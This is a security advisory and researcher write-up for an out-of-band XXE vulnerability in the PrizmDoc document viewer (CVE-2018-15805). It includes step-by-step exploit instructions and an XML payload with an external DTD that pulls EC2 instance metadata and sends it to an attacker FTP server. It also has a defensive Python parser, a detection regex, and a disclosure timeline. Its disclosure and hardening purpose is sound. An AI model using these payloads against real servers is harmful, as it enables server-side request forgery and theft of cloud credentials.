OOB XXE in PrizmDoc (CVE-2018-15805)


About PrizmDoc:

PrizmDoc is a web-based online document viewer and can be embedded into any web page or linked to from any website. The Viewing Client uses AJAX technology to communicate with the server to create a fast rendering of your content on the fly.

Vulnerability:

An XML External Entity attack is a type of attack against an application that parses XML input. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Vulnerable System:

PrizmDoc < 13.5

I originally found this on several bug bounty programs (on older versions of PrizmDoc), but later realized it's a 0-day after testing on the latest version of PrizmDoc.

I didn't have a test server, so I performed the test for the POC on their demo server located here:

https://www.accusoft.com/demos/file-type-demo/

Exploit:

  1. Browse to URL: https://www.accusoft.com/demos/file-type-demo/
  2. Scroll down to viewer.
  3. Click on download.
  4. Choose Download as PDF, tick corresponding to redactions.
  5. Click on download.
  6. Intercept the request using Burp Suite; the request will look like this:

POST /pcc/ViewingSession/ud6e8-z6riLGCd8LEK-08IonE_yHaGKTl3npOe2Z2dfJ_qnX5YVH2HT2BtFySMgBxT41T9CKW_YG_ilHEFwDhPra9NpkapKoxPWEk2FC5Zk/MarkupBurner HTTP/1.1
Host: pcc-demos.accusoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Accusoft-Gid: GYiW8kmOutLSMTRWwxC45w
Accusoft-Parent-Name: ViewerControl
Accusoft-Parent-Pid: 0
Accusoft-Parent-Taskid: 0
Referer: https://www.accusoft.com/demos/file-type-demo/
Content-Length: 413
Origin: https://www.accusoft.com
Connection: close
<documentAnnotations><pages><page id="1" pageWidth="1440" pageHeight="810"></page><page id="2" pageWidth="1440" pageHeight="810"></page><page id="3" pageWidth="1440" pageHeight="810"></page><page id="4" pageWidth="1440" pageHeight="810"></page></pages><highlights /></documentAnnotations>

  7. Modify the above request to include an external DTD, such as:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://external.url/evil.dtd"> %asd; %c; ]>
<documentAnnotations>&rrr;<pages><page id="1" pageWidth="1440" pageHeight="810"></page><page id="2" pageWidth="1440" pageHeight="810"></page><page id="3" pageWidth="1440" pageHeight="810"></page><page id="4" pageWidth="1440" pageHeight="810"></page></pages><highlights /></documentAnnotations>

In the payload above, the DOCTYPE declares a parameter entity that points to an external URL hosting a DTD file; that DTD in turn defines the general entity, which is then referenced as &rrr; inside <documentAnnotations>.

The DTD file should look like this:

Evil.dtd:

<!ENTITY % d SYSTEM "http://169.254.169.254/latest/meta-data/hostname">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

After setting this up, run the emulated FTP server on a port and make sure that same port is the one referenced in evil.dtd, so the back connection reaches it (see https://medium.com/@mrnikhilsri/soap-based-unauthenticated-out-of-band-xml-external-entity-oob-xxe-in-a-help-desk-software-c27a6abf182a for this setup):

<!ENTITY rrr SYSTEM 'ftp://your-vps-ip:2121/%d;'>

  8. Now modify the HTTP request from step 6 with the XXE payload from step 7 and replay it, as shown in the screenshot:

Watch the FTP server: you will receive a back connection carrying the EC2 metadata, as shown in the screenshot:
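The root cause in steps 6 to 8 is that the annotation XML is parsed with DTD processing and external entity resolution left on, even though the legitimate request never carries a DOCTYPE. The following is an added example, not PrizmDoc's code, of how a server can parse a <documentAnnotations> body like the one in step 6 while refusing every DTD construct the exploit relies on. It uses only the Python standard library's expat binding; the function and class names, the constructed sample bodies, and the placeholder URL http://xxe.invalid/evil.dtd are my own.

```python
"""Hardened parsing of a PrizmDoc-style <documentAnnotations> body.

Added example (not PrizmDoc's code). The legitimate MarkupBurner request only
ever contains <documentAnnotations>, <pages>, <page> and <highlights>, so the
parser below treats any DOCTYPE, entity declaration or external entity
reference as an attack indicator and refuses the request outright.
"""
import re
from xml.parsers import expat


class ForbiddenXML(Exception):
    """Raised when the input carries DTD constructs the application never needs."""


def parse_annotations(body: bytes) -> list:
    """Return the <page> elements as dicts; raise ForbiddenXML on any DTD usage."""
    parser = expat.ParserCreate()
    # Never fetch external parameter entities such as SYSTEM "http://.../evil.dtd".
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Fires at "<!DOCTYPE", before any entity in the internal subset is seen.
        raise ForbiddenXML("DOCTYPE declarations are not accepted")

    def reject_entity(*decl):
        raise ForbiddenXML("entity declarations are not accepted")

    def reject_external_ref(context, base, system_id, public_id):
        raise ForbiddenXML("external entity references are not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external_ref

    pages = []

    def start_element(name, attrs):
        if name == "page":
            pages.append({
                "id": attrs.get("id"),
                "width": attrs.get("pageWidth"),
                "height": attrs.get("pageHeight"),
            })

    parser.StartElementHandler = start_element
    parser.Parse(body, True)  # exceptions raised inside handlers propagate here
    return pages


def is_accepted(body: bytes) -> bool:
    """True if the body parses cleanly, False if the hardened parser refused it."""
    try:
        parse_annotations(body)
        return True
    except ForbiddenXML:
        return False


def has_dtd_markers(body: bytes) -> bool:
    """Cheap pre-parse check suitable for request logging or a WAF rule."""
    return re.search(rb"<!(DOCTYPE|ENTITY)\b", body, re.IGNORECASE) is not None


# Constructed sample: the benign body captured in step 6 of the write-up.
BENIGN_BODY = (
    b'<documentAnnotations><pages>'
    b'<page id="1" pageWidth="1440" pageHeight="810"></page>'
    b'<page id="2" pageWidth="1440" pageHeight="810"></page>'
    b'<page id="3" pageWidth="1440" pageHeight="810"></page>'
    b'<page id="4" pageWidth="1440" pageHeight="810"></page>'
    b'</pages><highlights /></documentAnnotations>'
)

# Constructed sample: the same body with the step 7 DOCTYPE prepended;
# xxe.invalid is a placeholder host, not a real server.
XXE_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://xxe.invalid/evil.dtd"> %asd; ]>'
    b'<documentAnnotations>&rrr;<pages>'
    b'<page id="1" pageWidth="1440" pageHeight="810"></page>'
    b'</pages><highlights /></documentAnnotations>'
)


if __name__ == "__main__":
    print("benign pages:", parse_annotations(BENIGN_BODY))
    print("benign accepted:", is_accepted(BENIGN_BODY))
    print("xxe accepted:", is_accepted(XXE_BODY))
    print("xxe has DTD markers:", has_dtd_markers(XXE_BODY))
```

The important design choice is to reject at the DOCTYPE handler rather than trying to allow "safe" DTDs: the endpoint has no legitimate use for one, so the whole class of entity tricks (external, parameter, nested) disappears at once, and the regex check gives a logging hook that fires even before the parser is invoked. The same idea applies to whatever parser PrizmDoc actually uses; the fix in 13.5 is not described on this page, so this example is a general hardening pattern, not the vendor's patch.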

Quick Video POC:

Timeline:

  • 23 August 2018 — Reported the issue to PrizmDoc
  • 23 August 2018 — Acknowledgement from PrizmDoc
  • 23 August 2018 — Request for CVE
  • 23 August 2018 — CVE assigned
  • 29 August 2018 — Vendor response: fix scheduled for release in October
  • 8 November 2018 — Vulnerability fixed
  • 13 November 2018 — Published

Discovered by:

Nikhil (@niksthehacker)